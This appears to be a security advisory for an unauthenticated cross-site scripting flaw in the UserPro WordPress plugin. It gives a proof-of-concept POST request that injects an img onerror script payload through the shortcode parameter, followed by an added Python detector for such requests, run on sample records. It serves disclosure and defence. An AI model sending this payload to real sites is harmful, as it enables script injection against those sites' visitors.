UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
Description
An unauthenticated cross-site scripting (XSS) vulnerability that affects UserPro versions 2.13 through 4.9.23.
Proof of Concept
POST /wp-admin/admin-ajax.php
Host: domain.com
action=userpro_shortcode_template&shortcode=[userpro<img src=a onerror=alert(1)> id=1 layout="float" collage_per_page="20" emd_paginate_top="1" emd_paginate="1" emd_gender="Gender,radi
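A detection check for the request shape shown in the proof of concept, added here as an example (it is not part of the original advisory or of the plugin's code). It assumes a WAF or reverse proxy that records the method, path and form-encoded body of each request; the function names and the sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "userpro_shortcode_template"
# Markup that has no place in a shortcode string: a tag opener or an
# inline event-handler attribute such as onerror=.
MARKUP = re.compile(r"<\s*[a-z!/]|\bon[a-z]+\s*=", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded input (%253C) is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(method, path, body):
    """True for a POST to admin-ajax.php that calls the UserPro shortcode
    template action with HTML markup inside the shortcode parameter."""
    if method.upper() != "POST" or path.split("?")[0] != AJAX_PATH:
        return False
    params = parse_qs(body, keep_blank_values=True)  # decodes one layer
    if ACTION not in params.get("action", []):
        return False
    return any(MARKUP.search(fully_decode(v)) for v in params.get("shortcode", []))


# Constructed sample records (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", AJAX_PATH, 'action=userpro_shortcode_template&shortcode=[userpro<img src=a onerror=alert(1)> id=1]'),
    ("POST", AJAX_PATH, "action=userpro_shortcode_template&shortcode=%255Buserpro%253Cimg%2520src%253Da%255D"),
    ("POST", AJAX_PATH, 'action=userpro_shortcode_template&shortcode=[userpro id=1 layout="float"]'),
    ("POST", AJAX_PATH, "action=heartbeat&data=<b>hi</b>"),
    ("GET", AJAX_PATH, ""),
]


def flagged_indexes(records):
    """Return the positions of records that match the advisory's pattern."""
    return [i for i, rec in enumerate(records) if is_suspicious(*rec)]


if __name__ == "__main__":
    print(flagged_indexes(SAMPLES))
```
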